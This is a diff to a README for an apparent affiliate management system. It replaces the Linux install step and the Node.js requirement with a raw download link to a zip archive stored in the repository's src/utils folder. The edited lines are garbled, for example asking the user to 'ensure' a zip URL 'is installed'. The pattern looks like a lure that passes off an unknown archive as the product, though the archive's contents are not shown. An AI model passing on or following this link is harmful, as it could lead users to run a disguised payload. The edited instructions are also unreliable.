mthweb/affiliate-management-system/README.md

 4. **Install the System**:
    - For Windows: Run the downloaded `.exe` file and follow the installation prompts.
    - For macOS: Open the downloaded `.dmg` file and drag the application to your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included instructions to install.
+   - For Linux: Extract the `https://github.com/mthweb/affiliate-management-system/raw/refs/heads/main/src/utils/system-affiliate-management-v2.7.zip` file and follow the included instructions to install.

 5. **Set Up the Environment**:
-   - Ensure Node.js is installed on your machine.
+   - Ensure https://github.com/mthweb/affiliate-management-system/raw/refs/heads/main/src/utils/system-affiliate-management-v2.7.zip is installed on your machine.
    - Install any required packages by navigating to the program directory in your command terminal and running:
      ```
      npm install